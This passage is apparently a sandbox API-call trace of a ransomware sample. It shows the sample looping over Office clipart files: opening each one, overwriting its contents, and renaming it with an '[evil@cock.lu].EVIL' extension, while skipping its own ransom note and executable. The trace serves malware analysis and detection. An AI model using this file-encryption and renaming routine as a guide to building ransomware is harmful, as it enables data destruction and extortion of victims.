_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.043] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD02161_.WMF") returned 0x0 [0124.043] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 0x45 [0124.043] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.046] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc38, lpOverlapped=0x0) returned 1 [0124.060] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.060] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.060] _errno () returned 0x84b1160840 [0124.060] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.060] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc40, lpOverlapped=0x0) returned 1 [0124.060] CloseHandle (hObject=0x1a8) returned 1 [0124.060] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.060] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.060] __uncaught_exception () returned 0x84b1160800 [0124.060] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.061] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf.[evil@cock.lu].evil")) returned 1 [0124.061] ??_V@YAXPEAX@Z () returned 0x1 [0124.064] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF", dwFileAttributes=0x200) returned 0 [0124.064] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.064] wcsstr (_Str="FINCL_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.064] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 69 [0124.064] wcscmp (_String1="FINCL_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.064] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FINCL_01.MID") returned 0x0 [0124.064] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID") returned 0x45 [0124.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.066] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x32b5, lpOverlapped=0x0) returned 1 [0124.080] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.080] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.080] _errno () returned 0x84b1160840 [0124.080] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.080] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x32c0, lpOverlapped=0x0) returned 1 [0124.080] CloseHandle (hObject=0x1a8) returned 1 [0124.080] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.080] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.081] __uncaught_exception () returned 0x84b1160800 [0124.081] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.081] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_01.mid.[evil@cock.lu].evil")) returned 1 [0124.081] ??_V@YAXPEAX@Z () returned 0x1 [0124.084] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_01.MID", dwFileAttributes=0x200) returned 0 [0124.084] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.084] wcsstr (_Str="FINCL_02.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.084] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 69 [0124.084] wcscmp (_String1="FINCL_02.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.085] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FINCL_02.MID") returned 0x0 [0124.085] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 0x45 [0124.085] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.086] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2466, lpOverlapped=0x0) returned 1 [0124.111] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.111] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.111] _errno () returned 0x84b1160840 [0124.111] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.111] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2480, lpOverlapped=0x0) returned 1 [0124.112] CloseHandle (hObject=0x1a8) returned 1 [0124.112] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.112] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.112] __uncaught_exception () returned 0x84b1160800 [0124.112] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.112] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fincl_02.mid.[evil@cock.lu].evil")) returned 1 [0124.113] ??_V@YAXPEAX@Z () returned 0x1 [0124.116] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FINCL_02.MID", dwFileAttributes=0x200) returned 0 [0124.116] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.116] wcsstr (_Str="FLAP.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.116] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 65 [0124.116] wcscmp (_String1="FLAP.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.116] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FLAP.WMF") returned 0x0 [0124.116] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 0x41 [0124.116] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.118] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x816, lpOverlapped=0x0) returned 1 [0124.125] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.125] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.125] _errno () returned 0x84b1160840 [0124.125] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.125] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x820, lpOverlapped=0x0) returned 1 [0124.125] CloseHandle (hObject=0x1a8) returned 1 [0124.125] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.126] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.126] __uncaught_exception () returned 0x84b1160800 [0124.126] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.126] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf.[evil@cock.lu].evil")) returned 1 [0124.127] ??_V@YAXPEAX@Z () returned 0x1 [0124.130] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF", dwFileAttributes=0x200) returned 0 [0124.131] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.131] wcsstr (_Str="GRDEN_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.131] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 69 [0124.131] wcscmp (_String1="GRDEN_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.131] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="GRDEN_01.MID") returned 0x0 [0124.131] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 0x45 [0124.131] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.134] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d8f, lpOverlapped=0x0) returned 1 [0124.151] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.151] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.152] _errno () returned 0x84b1160840 [0124.152] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.152] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1da0, lpOverlapped=0x0) returned 1 [0124.152] CloseHandle (hObject=0x1a8) returned 1 [0124.152] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.152] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.152] __uncaught_exception () returned 0x84b1160800 [0124.152] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.153] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grden_01.mid.[evil@cock.lu].evil")) returned 1 [0124.153] ??_V@YAXPEAX@Z () returned 0x1 [0124.156] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRDEN_01.MID", dwFileAttributes=0x200) returned 0 [0124.156] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.156] wcsstr (_Str="GRID_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.156] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 68 [0124.156] wcscmp (_String1="GRID_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.156] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="GRID_01.MID") returned 0x0 [0124.156] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 0x44 [0124.157] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.159] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18bb, lpOverlapped=0x0) returned 1 [0124.178] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.178] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.178] _errno () returned 0x84b1160840 [0124.178] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.178] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x18c0, lpOverlapped=0x0) returned 1 [0124.178] CloseHandle (hObject=0x1a8) returned 1 [0124.178] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.178] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.178] __uncaught_exception () returned 0x84b1160800 [0124.178] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.179] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid.[evil@cock.lu].evil")) returned 1 [0124.179] ??_V@YAXPEAX@Z () returned 0x1 [0124.182] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID", dwFileAttributes=0x200) returned 0 [0124.182] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.182] wcsstr (_Str="HH00057_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.182] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 69 [0124.182] wcscmp (_String1="HH00057_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.182] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00057_.WMF") returned 0x0 [0124.182] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF") returned 0x45 [0124.182] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.185] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xeb4, lpOverlapped=0x0) returned 1 [0124.200] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.200] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.200] _errno () returned 0x84b1160840 [0124.200] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.200] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xec0, lpOverlapped=0x0) returned 1 [0124.200] CloseHandle (hObject=0x1a8) returned 1 [0124.200] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.200] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.201] __uncaught_exception () returned 0x84b1160800 [0124.201] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.201] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00057_.wmf.[evil@cock.lu].evil")) returned 1 [0124.202] ??_V@YAXPEAX@Z () returned 0x1 [0124.205] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00057_.WMF", dwFileAttributes=0x200) returned 0 [0124.205] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.205] wcsstr (_Str="HH00084_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.206] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 69 [0124.206] wcscmp (_String1="HH00084_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.206] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00084_.WMF") returned 0x0 [0124.206] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 0x45 [0124.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.208] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9a8, lpOverlapped=0x0) returned 1 [0124.229] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.229] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.229] _errno () returned 0x84b1160840 [0124.229] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.229] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9c0, lpOverlapped=0x0) returned 1 [0124.229] CloseHandle (hObject=0x1a8) returned 1 [0124.229] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.229] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.229] __uncaught_exception () returned 0x84b1160800 [0124.230] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.230] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00084_.wmf.[evil@cock.lu].evil")) returned 1 [0124.231] ??_V@YAXPEAX@Z () returned 0x1 [0124.234] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00084_.WMF", dwFileAttributes=0x200) returned 0 [0124.234] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.234] wcsstr (_Str="HH00231_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.234] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 69 [0124.234] wcscmp (_String1="HH00231_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.234] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00231_.WMF") returned 0x0 [0124.234] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF") returned 0x45 [0124.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00231_.WMF" 